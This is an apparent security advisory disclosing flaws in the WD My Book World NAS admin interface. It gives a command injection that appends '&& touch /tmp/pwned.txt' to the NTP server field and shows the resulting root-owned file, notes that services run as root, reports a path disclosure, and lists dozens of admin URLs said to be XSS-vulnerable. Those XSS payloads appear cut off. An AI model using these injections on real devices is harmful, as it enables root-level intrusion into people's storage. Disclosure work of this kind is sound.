# Exploit Title: My Book World Edition NAS multiple vulnerability # Date: 20091230 # Author: Emanuele 'emgent' Gentili # Code: http://www.backtrack.it/~emgent/exploits/20091230-NAS.txt # Version: 01.01.16 with MioNet 2.3.9.13 firmware. # CVE : N/A # Vendor: http://www.wdc.com/mybookworld [+] REMOTE COMMAND EXECUTION Pages: http://10.12.6.111/admin/e_datetime.php?lang=en http://10.12.6.111/admin/system_general.php?lang=en Box entry: NTP TIME SERVER: "pool.ntp.org && touch /tmp/pwned.txt" Output: ~ # ls -la /tmp/ |grep pwned -rw-rw-rw- 1 root root 0 Dec 30 08:25 pwned.txt ~ # [+] WEB SERVER DEFAULT SECURITY MISSCONFIGURATION All services and web applications run with root privileges, so exploiting web apps is possible run command with uid 0 privileges. [+] INFORMATION DISCLOSURE Browsing http://10.12.6.111/help/express.php?lang=en%22 is possible see the real path in the system, via xml error not blocked. [+] CROSS SITE SCRIPTING (XSS) A lot of XSS attacks are possible in this web application, all "?lang=" var are vulnerable. http://10.12.6.111/admin/basic_index.php?lang=en"> http://10.12.6.111/admin/system_config_manage.php?lang=en"> http://10.12.6.111/admin/system_alerts.php?lang=en"> http://10.12.6.111/admin/system_index.php?lang=en"> http://10.12.6.111/admin/system_firmware_automated.php?lang=en"> http://10.12.6.111/admin/system_firmware_manual.php?lang=en"> http://10.12.6.111/admin/system_general.php?lang=en"> http://10.12.6.111/admin/shutdown_reboot.php?lang=en"> http://10.12.6.111/admin/shutdown_reboot.php?lang=en"> http://10.12.6.111/admin/system_advanced.php?lang=en"> http://10.12.6.111/admin/system_generate_ssl_form.php?lang=en"> http://10.12.6.111/admin/network_index.php?lang=en"> http://10.12.6.111/admin/network_lan.php?lang=en"> http://10.12.6.111/admin/network_service.php?lang=en"> http://10.12.6.111/admin/network_workgroup_domain.php?lang=en"> http://10.12.6.111/admin/storage_index.php?lang=en"> http://10.12.6.111/admin/storage_disk_manage.php?lang=en"> http://10.12.6.111/admin/storage_volume_manage.php?lang=en"> http://10.12.6.111/admin/storage_share_manage.php?lang=en"> http://10.12.6.111/admin/storage_usb_manage.php?lang=en"> http://10.12.6.111/admin/storage_quota_manage.php?lang=en"> http://10.12.6.111/admin/storage_download_manage.php?lang=en"> http://10.12.6.111/admin/system_change_btadmin_passwd.php?lang=en"> http://10.12.6.111/admin/storage_share_add.php?lang=en"> http://10.12.6.111/admin/storage_share_edit.php?share=user&volume=DataVolume&md=md2&lang=en"> http://10.12.6.111/admin/media_index.php?lang=en"> http://10.12.6.111/admin/itune_server_properties.php?lang=en"> http://10.12.6.111/admin/access_control_index.php?lang=en"> http://10.12.6.111/admin/access_control_shareaccess_manage.php?lang=en"> http://10.12.6.111/admin/access_control_shareaccess_edit.php?id=1&lang=en"> http://10.12.6.111/admin/status_index.php?lang=en"> http://10.12.6.111/admin/index.php?lang=en"> http://10.12.6.111/admin/status_log_system.php?lang=en"> http://10.12.6.111/admin/status_log_cifs.php?lang=en"> http://10.12.6.111/admin/status_log_ftp.php?lang=en"> http://10.12.6.111/admin/status_log_setting.php?lang=en"> http://10.12.6.111/admin/e_shutdown_reboot.php?lang=en"> http://10.12.6.111/admin/e_machine.php?lang=en"> http://10.12.6.111/admin/e_datetime.php?lang=en"> http://10.12.6.111/admin/e_network.php?lang=en"> http://10.12.6.111/admin/e_user_mgmt.php?lang=en"> http://10.12.6.111/admin/e_user_change_passwd.php?id=2&lang=en"> http://10.12.6.111/admin/e_user_mgmt.php?act=del&id=user&lang=en"> http://10.12.6.111/admin/e_user_add.php?lang=en"> http://10.12.6.111/admin/e_share_mgmt.php?lang=en"> http://10.12.6.111/admin/e_share_mgmt.php?type=share&act=del&share=user&volume=DataVolume&md=md2&lang=en"> http://10.12.6.111/admin/e_share_add.php?lang=en"> http://10.12.6.111/admin/e_index.php?lang=en"> http://10.12.6.111/admin/e_mionet.php?lang=en"> http://10.12.6.111/admin/basic_index.php?action=logout&lang=en"> http://10.12.6.111/help/system.php?lang=en">&page=system_summary and more other...